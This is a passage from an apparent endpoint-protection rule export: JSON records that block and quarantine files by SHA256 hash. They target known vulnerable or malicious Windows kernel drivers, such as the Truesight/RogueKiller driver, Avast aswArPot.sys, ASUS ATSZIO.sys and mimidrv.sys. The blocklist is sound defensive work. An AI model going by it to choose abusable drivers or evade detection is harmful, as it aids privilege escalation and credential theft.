"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830926Z", + "creation_date": "2026-03-23T11:45:30.830929Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830934Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c861174040ee2b28e4f79fa1d5829356f8e728a4913d41c217d15a1742636f32", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1616d13c-ab3f-5b1c-a737-6c63860c4a8b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.472080Z", + "creation_date": "2026-03-23T11:45:31.472084Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.472093Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7b568c4e4c1c7dd554cfdf07bf0132f3465a4afeed5a9ce706edcf7860b26f0a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1627cb79-875d-5ba1-9838-c6cf4ed90875", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", 
+ "last_update": "2026-03-23T11:45:29.612699Z", + "creation_date": "2026-03-23T11:45:29.612701Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612706Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1d5ded14ba7821a1021815e70399801bf87dadf9b9eb17325e3c918d53971c8e", + "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1638ff1f-2991-5296-b351-7177cfd89412", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.814747Z", + "creation_date": "2026-03-23T11:45:31.814751Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.814758Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "eaf8ebd8ded6b90d0a18a8ba64a0e8204da93ff0012b119dc509fa4167b0098a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "163db276-568f-529a-866a-2c1977160f7b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.477957Z", + "creation_date": "2026-03-23T11:45:30.477960Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.477969Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "633ae4822602acd252ff23e73ef4cc98130f3e3988ac459f7fda5102fcef5fce", + "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "163e58a7-c43c-5aa6-a62d-1cba52cd4c38", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144909Z", + "creation_date": "2026-03-23T11:45:31.144911Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.144917Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "924de0ef972f4db7bee5f24f32b558a8fe7e7fe7bfdcaca1c7996a0cb67e33b1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "164192c9-6a0d-5bcd-8512-65371ed020dc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622036Z", + "creation_date": "2026-03-23T11:45:29.622038Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622044Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "92edd48dfac025d4069eb6491b9730d9d131b77cceaa480af9b3c32bc8c5e3a9", + "comment": "Vulnerable Kernel Driver (aka AsIO.sys) [https://www.loldrivers.io/drivers/bd7e78db-6fd0-4694-ac38-dbf5480b60b9/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "16467a79-82c0-5c3d-a3dc-b5004a2c40f0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144499Z", + "creation_date": "2026-03-23T11:45:31.144501Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.144535Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8b82e0c2e81f47754b5af6a366725ed07b283699873663806d3a375e9fdcf9d2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1662785f-79ee-5539-9c0a-d839d9f11efd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.834028Z", + "creation_date": "2026-03-23T11:45:30.834031Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.834039Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "8f3c0232f43e940cf8e7dca3ef30eb202bfbcc5c22b1f4aec5eac93fa1bb8764", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "166aef44-aa84-596c-a4d9-11e00b2013c6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970157Z", + "creation_date": "2026-03-23T11:45:29.970160Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970165Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "60f79c1b60a74b98b4f436d6bbbf5aeb9ce6febbe1443d318eea7581962b75a4", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1671a50f-38ac-5c13-9932-47f8a0f78862", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828359Z", + "creation_date": "2026-03-23T11:45:31.828362Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828371Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e02a5f2f9e809dc4b43f1efd738468dd2d4c2ece245e79e53a573cdcdb4dcb6e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1675de5b-12f8-5adc-b16b-13199706802b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.473295Z", + "creation_date": "2026-03-23T11:45:31.473298Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.473307Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0099c687fd570537a97703491cf4d58c0aa7263dffa84f04f563e0abf871235c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "16774b23-ec54-5703-ac9c-dcd7d5f51ded", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.824794Z", + "creation_date": "2026-03-23T11:45:30.824797Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.824805Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ba3f881f656a0053081640d9381bc60cceec0d28f1b51ec9723fa8c1e4ab983c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "167be708-8035-5496-a8c5-252b56380848", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:30.459129Z", + "creation_date": "2026-03-23T11:45:30.459132Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.459141Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f488500be4eaafba74b644be95d4c0523297770fb9bb78c449f643ab8d4a05d9", + "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "168b1cc9-0bd9-5ed7-ba20-e45fc7c816d0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141646Z", + "creation_date": "2026-03-23T11:45:31.141648Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141654Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "90a225fd5dde6ed4f02b93c7fb8d61a7b1e971c7be89bf03489d1bca3bb6b9fa", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"168b7e66-f6bf-5741-a440-14bc17015155", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156449Z", + "creation_date": "2026-03-23T11:45:31.156451Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156456Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2062cb33e7c5aa01bf0f5c4c78d3c5a3bd757492545ab4494cfc6ccf2efa2da8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "16914bf1-0cfc-5340-ba93-ef24964b80bc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155402Z", + "creation_date": "2026-03-23T11:45:31.155405Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.155413Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "02d5694e2727bcd840e3563570d5d565a153632c55c0bbd074f32693e728b17c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1699d89a-9bc6-5018-b20f-f485f9c2b6a3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808320Z", + "creation_date": "2026-03-23T11:45:31.808323Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808328Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "13a17b8a155e0cf0a8fef9db9067cebfb69849c2311d52a5790239ab41e4572a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "169b66db-e58c-5638-afdc-98f96ee1d54e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479260Z", + "creation_date": "2026-03-23T11:45:30.479262Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479267Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "994f322def98c99aec7ea0036ef5f4b802120458782ae3867d116d55215c56e4", + "comment": "Vulnerable Kernel Driver (aka VBoxTAP.sys) [https://www.loldrivers.io/drivers/f22e7230-5f32-4c4e-bc9d-9076ebf10baa/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "16a0ae15-4c80-509d-af4e-79c1bfb72b34", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827309Z", + "creation_date": "2026-03-23T11:45:30.827311Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827316Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + 
"value": "08728784826b5240145fbfa4e6f98234690624cf0c2398eca40accda1c4f7e3e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "16ac11db-caa4-5526-add3-c7f991b5f3ab", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831371Z", + "creation_date": "2026-03-23T11:45:30.831374Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831382Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1c5b695c3336628a33aaa69c98551273a23021d0af663fec196aff2b80dc7636", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "16af6e9e-f2ee-59df-af86-56a6f5448285", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": 
false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.834756Z", + "creation_date": "2026-03-23T11:45:30.834759Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.834768Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c38fd37dd3694cdb2bab7ad1d403c25acf3caeefcf50f5b042a2ddc40a7b2f23", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "16be3c2d-df44-52b8-946b-e298e5629093", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.467619Z", + "creation_date": "2026-03-23T11:45:30.467622Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.467631Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4d11419d2f1d6217481d12d3f3fcd13f693f7454f9fadcdeee72bdc0ce06c8e2", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) 
[https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "16ce02a0-7718-5dc9-9268-9a48004c2d74", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.482090Z", + "creation_date": "2026-03-23T11:45:31.482094Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.482104Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "21949150dd0b15bcd883815e27a9b2bed0a4fc73efba1f821670ece3a4279002", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "16d4604f-f39c-5620-81a2-db3d7600332c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819532Z", + "creation_date": 
